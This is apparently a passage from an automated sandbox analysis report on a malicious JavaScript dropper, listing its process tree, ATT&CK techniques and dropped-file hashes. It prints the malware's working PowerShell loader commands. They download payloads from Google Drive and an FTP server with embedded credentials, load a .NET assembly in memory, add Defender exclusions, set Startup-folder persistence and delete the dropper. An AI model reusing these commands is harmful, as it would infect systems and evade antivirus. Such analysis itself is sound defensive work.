㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\npdii.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1688
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4564
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
        5⤵
        
        PID:4712

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\UnregisterJoin.jpe" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:5012

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4948

C:\Windows\regedit.exe
"regedit.exe" "C:\Users\Admin\Desktop\SyncUnregister.reg"
1⤵
- Runs .reg file with regedit
PID:3916

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\RestartResolve.asx"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffc80f6cc40,0x7ffc80f6cc4c,0x7ffc80f6cc58
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1920 /prefetch:2
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  PID:2848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:4508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:4032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4628,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:1
  2⤵
  PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4864,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:3188
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:5132
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff7c2664698,0x7ff7c26646a4,0x7ff7c26646b0
    3⤵
    - Drops file in Program Files directory
    PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5156,i,4714852553767844238,10044237800422589509,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:5228

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
cda93f3833584055767974b39597fd51

SHA1
f5fc25706becb8224fc3b690714908ae9856f69c

SHA256
818fa13830e1e3dce49c3ffd80a2166722ad5a2abf9fe8d3f8828f2fc3f716ac

SHA512
e6a2fa93aee3cc8aafc930791069ff10e4d6c6deec9ab0692f95d069a6e4cdb0f0bc2fc9e0e475a7ce41a153844c7ea935dddd6126f3be0cdbfa7f583f3ed7a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
212KB

MD5
08ec57068db9971e917b9046f90d0e49

SHA1
28b80d73a861f88735d89e301fa98f2ae502e94b

SHA256
7a68efe41e5d8408eed6e9d91a7b7b965a3062e4e28eeffeefb8cdba6391f4d1

SHA512
b154142173145122bc49ddd7f9530149100f6f3c5fd2f2e7503b13f7b160147b8b876344f6faae5e8616208c51311633df4c578802ac5d34c005bb154e9057cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
2af1ee53d7f47287de63404185d12ab9

SHA1
9a78f79e992a3a38e6b75bda643d3b954b8c8dc8

SHA256
9be2cad7d94fe6574dca9d533b35dcda4f72b61fff74d96c4c2d67fc3c84e2e6

SHA512
9cebc2c9305a5e8343b18574cf4a0e84360ffb761c6fa795531d1b1a30129ba0e3d4bc3d313988361a7bd75f43abf3b2e78d36589994a1521d8fb3e38e299440

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
250167b991f1261cfcb55dd0c5c95d77

SHA1
c54cd1d253b7c282316de368b5da22e916c1d1e9

SHA256
6df3a0c9f1380901057d7bd34ae933cca252febd3c086abe0b8348743a2da9dd

SHA512
e7b23d119ba9c9fd5f436f7e7393567fd08ea415aaf213cfe3d43d3f7d7d7174ac551d9860bd428a81b29cd101971bee8a5c7ae3fe5ae819d993d339ad19d547

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
33035b7f1cc569a655b98cf697951fc2

SHA1
d3f57517ef5a968aef848cf7e0e611624ffea6f5

SHA256
2ec8e005ddff9c99462153b2cd9fbfcf08bec16c027359073b0f8d550f9a673d

SHA512
61251c095fa8626d85cbe2a5ff1bb4648be0d5aac45db4bb04b855a584cc52249927e5de695e051622e525e3c7fdceb4c58947c125b8be97867469cc5779db44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
75cd433dacbf7c636fee3573c636fd28

SHA1
935e203d95132a79ca717a640954f4e3005e1125

SHA256
59726f94f5df68735812bd83c089598244d6618304ed831474c02ea8cbfbfec8

SHA512
658e5ecedf4ae370e2c60acdb5ae38041a2d3d30f4d51ceb0d5fcdc04f771ed2476a543e8fc44f50b0334b057dbb4cab4d01e7379e61b19cf2ca9c7f5773e0b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
53f36fe4e3817ebb3078c142737332c9

SHA1
2158318a0432075ed9a6158150c151640f274a19

SHA256
08a48b13480f7df839a2f3fd53f37dea3be22aaff26ac43be1f879fdf7edb56e

SHA512
3476f1ee8e4634009811a359d246412e412d73159fb29d3f0e2861bbf39555362f2732b7b0fffb16f8ba6f2cc3144daf6276e700611de446154faf8be4699e90

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
31170a0df3beab635ee9f3f17e3fed99

SHA1
dbdb9135d7afac8f1bad87d371bd817b9796fef5

SHA256
1cbe3a4b2be69093a01a9276846387b9ff94a4d12de01908387045340d1a1653

SHA512
5e092ab55485f92accccc017006cb004cd16136c4fe1002bcbec0b0eb5088f831e1818f30ea7441066b4cd4e34f618cdd4bb278870ebff99caf9d1beb6dd0e01

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d2731231e2994e138c80efe957677ba6

SHA1
fa7bedb141f696ace29a27439ce95e2d2b335236

SHA256
516338d49a2a31b3f0dc48431e1d9f8053ededf2586bd15dba0663cb22fea154

SHA512
fb850934a685c6cc82b18c7ad9f23de572477509ef313bb6cfba63a3a4a436a58baedeff762affb3f0a989e4f61afba25e873dafd94771e3cb47ff7c375927f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
6542f95b35d0de60e334b311fb96b4f6

SHA1
b65c31c8171a2c6f4afc2eeaed8109483fa33a6c

SHA256
1a4b5689f15d052ddccd9d344f72cabe328cba3e4273b35cdc9929dd08590097

SHA512
4d49c6b61515ab37a0974aa905ce591fb6ed2c9eead508c48e6e5dae81599f4eafc10355bfe90477dc42cf0b1a2edf44740250b7bc49e9b333d66ae079cc50a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
211KB

MD5
1b39dac47c86f264ca8df90b4c835fe5

SHA1
8444afee650c5b858f332fb1cf9914446946ede9

SHA256
e970ac8ff86a02e5ec57cc3d6a22a2290f2ce8a84092479408d27a8d41f29019

SHA512
e14b053362d1780713294e3f54f9f9a6cd2ecdc94976e65de4dab551d7ae343f6ab948550a40967026c751fcfb3e9f98aaea1a6a40a66745ec4c780e1c1e8c97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
211KB

MD5
5d2ecae09d7d8a6cb7061bcde432a681

SHA1
91dabd90c6499e24c45f75ca90a6b55b7d9933a6

SHA256
7d5d3a21f793a03e0ef4dc5d55da4180d13d2d557808c03f59f258ffbde3a958

SHA512
70461f56d77d2e9328acd5633acd5e79f0f27a45c60cb390032fbeb67b7640585a35d65f58f7f9c843f577a1bec57027e90595143c11b62c13d3edefec228d64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
211KB

MD5
10a6860aaf890d4b3ac640965d767168

SHA1
23a3cd6102f594312e755344fd562a1bbe4bce3b

SHA256
135740fa0f5a14b269c8725dfaba4217b8b177b420d4170a5f4b2781e5eda8d0

SHA512
4d89ae27f39c45aad091495183ffd29b33b067d8598de0fec44c95c035e76e857850546dcb43ed538c811e5043add25d3b8cb4a61da806a78d6f4031ea70b8fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
b0797b26e864af349e42e8d5470b9054

SHA1
35aca04aabfd97e62281d4f6313ddf0a471e1b09

SHA256
94b067c3230f1a109236b2da740b3bc3b0aaa4f97ec67a4b305de0b3ceaec9b4

SHA512
dcdf615177220d5f57456771b018712abfdb9944df1796f22ebb75ada261c499adf0b5992aba9fbe49f5607f22f7e1b4462a0f007f689407564d9558a231b853

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\npdii.ps1

Filesize
132KB

MD5
5d6acf998701782dbc41e3cca20839ae

SHA1
8fa365fd0df099df35d06bc9178d435ad2a9f472

SHA256
e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f

SHA512
9da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
fc6614e21c17c96fb87d292f2a7f97ce

SHA1
18c01d2cfdca4e123aa58ec402daa5cd3c7e9854

SHA256
ca8494e4c93b5f434857f5380d0abbf71a8ff35fd10b6d657bb478fc4ab861eb

SHA512
0502d3bae773f4cbcd89bab36d1694085944166fce6b429938d60a44d1f5a3095abdd33911672b9993b1cabd4cca7f7c7ab3df80a397a41236fe026640b8336f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0dfc87d52784026f73d57192cb575195

SHA1
720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd

SHA256
bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2

SHA512
c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8e5cef92c32d1ee46302f44504bb69d4

SHA1
dd691b9cb7a072712d364302c092b2a6c2e95806

SHA256
ac08dbc1b19f220d8b0497ec5376e26fdac8d3ef3445095f0530c916a14b5a9b

SHA512
0b9a74c3d67a7334d90830ba3e361387e09bae17fe7e08e415056e561a159019a492fdb51c85176abbf03d81077a0e00f45299e5af50347e335ab9f3044773b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
81de0135df168248219b7df7b498feed

SHA1
10ad9dd60942f4ac29cf94f4d9d8ffbf0fb8fdd2

SHA256
aff2c95b5584e52721abcef5843a4938f75aba3d85fab76b023a728211b2b991

SHA512
d90c55c66c89fa0c8d45f17ebc9384d6fd31b4849b81c33702bcf7c3b51f226ad9b53f57b98de7e5a84b3bec1478831a15e64fd3b796039cbfd34e6e83f1c401

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
39082f29e31546c5291f9a548ec503e6

SHA1
b72459548e870a37faad81b3175ef7f7fb878c80

SHA256
6b3b34c3fb4d00c053f47f1e72906c14ec609314c972deace3d31db31622b11a

SHA512
da6e73082123b6c389ccafeee55470d0a19d16e15307db6345663a6a372ee375805c3ccdd113f10d482d2c6a7200249c0af76510c44448a6e5870f83d93592ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_he5lmfux.vck.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.js

Filesize
12KB

MD5
1fb86474569cb04bd88f9421f0928f51

SHA1
7c9f86002055e8468dd14da6dc4c63f03ac8e4a7

SHA256
7f34301509d6975851c1cffedbce7b05b5e3549e2dbdd7f0f4a6dfa5900d83b1

SHA512
3e24ab6ae2bdbd0729a1ee0aeba249dbaa94e0655d893662dd2b63ee030d2e043b79f324c743eaa6c8508140496021aa11e8d94c70e5cda89da725ce12aeda0f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
18KB

MD5
577ba1ce7c6e1335320851d294e928ec

SHA1
7504b076a6b9c073eb23fff574bab139a33f28a1

SHA256
f9caa4a71c989860d397f0b7c9ebc09ab80ba77606a1c73b29b6ee50a29b2f5b

SHA512
9a0dec3b28f6f9a67cd554b3f0881e367d2ba37737a382e5376fc8a84d6d682cfc3bdced01550c0180ff5e51150ad5cf51c5086387864a4bc93847a32415eb2c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
memory/1448-42-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
memory/1448-68-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
memory/1448-64-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
memory/1448-63-0x00007FFC92F2D000-0x00007FFC92F2E000-memory.dmp

Filesize
4KB

Download
memory/1448-81-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
memory/1448-41-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
memory/1448-15-0x00007FFC92E90000-0x00007FFC93085000-memory.dmp

Filesize
2.0MB

Download
